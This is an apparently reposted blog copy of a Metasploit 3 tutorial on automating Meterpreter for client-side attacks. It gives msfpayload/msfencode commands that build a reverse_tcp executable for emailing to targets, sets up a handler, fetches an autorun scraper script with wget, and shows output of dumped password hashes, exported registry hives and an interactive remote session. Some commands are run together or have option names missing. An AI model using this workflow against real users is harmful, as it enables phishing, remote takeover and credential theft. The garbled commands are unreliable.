Metasploit 3 - Automating Meterpreter for Client-Side Exploits-白红宇

Metasploit 3 - Automating Meterpreter for Client-Side Exploits

阅读量：2433 次

发布时间：2019-05-10

本文共 2929 字，大约阅读时间需要 9 分钟。

Step 1. Determine your payload delivery. In this case, we will be manually sending an email message to each target, with an executable attached. The actual "exploit"

is social engineering, but this can be replaced by any other type of remote code execution vector. To generate an executable for the test, we use msfpayload piped to msfencode.

$ msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | /  msfencode -b _ -t exe -o meterpreter.exe

$ file meterpreter.exemeterpreter.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

$ ls -alrt meterpreter.exe-rw-r--r-- 1 hdm hdm 9728 Nov 17 13:24 meterpreter.exe

Step 2. Configure a shellcode handler inside Metasploit 3. Since we are targeting a wide

variety of users, we want them to connect back to us. In order to get the most amount

of information possible, we will be using the Meterpreter payload.

msf > use exploit/multi/handlermsf exploit(handler) > set  falsemsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST A.B.C.Dmsf exploit(handler) > set LPORT 8080

Step 3. In order to make efficient use of each session, we are going to provide

Meterpreter with an "autorun" script. This script will scrape system information

from each session automatically when the session is created. One example of this

kind of script can be found at:

msf exploit(handler) > sh -c 'cd /tmp; wget http://metasploit.com/users/hdm/tools/scraper.rb'msf exploit(handler) > set  /tmp/scraper.rbmsf exploit(handler) > exploit -j

Step 4. Send out our email or otherwise force the Meterpreter payload to execute

on each target. At this point, results should start streaming in. Once the autorun script

completes, the session will be available from the msfconsole. The captured data will be

stored in the ~/.msf3/logs/scraper/ directory.

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (75787 bytes)...[*] Upload completed.[*] New session on 10.10.11.164:12188...[*] Gathering basic system information...[*] Dumping password hashes...[*] Obtaining the entire registry...[*]  Exporting HKCU[*]  Downloading HKCU (C:/DOCUME~1/HD/LOCALS~1/Temp/NIgfrwlC.reg)[*]  Cleaning HKCU[*]  Exporting HKLM[*]  Downloading HKLM (C:/DOCUME~1/HD/LOCALS~1/Temp/dClzheFr.reg)[*]  Cleaning HKLM[*]  Exporting HKCC[*]  Downloading HKCC (C:/DOCUME~1/HD/LOCALS~1/Temp/mhJZFMly.reg)[*]  Cleaning HKCC[*]  Exporting HKCR[*]  Downloading HKCR (C:/DOCUME~1/HD/LOCALS~1/Temp/CphWxqAm.reg)[*]  Cleaning HKCR[*]  Exporting HKU[*]  Downloading HKU (C:/DOCUME~1/HD/LOCALS~1/Temp/aHrkdFru.reg)[*]  Cleaning HKU[*] Completed processing on 10.10.11.164:12188...[*] Meterpreter session 1 opened (10.10.10.26:8080 -> 10.10.11.164:12188)msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > getuidServer username: HDM-WIN/HD

转载地址：http://zuqmb.baihongyu.com/

你可能感兴趣的文章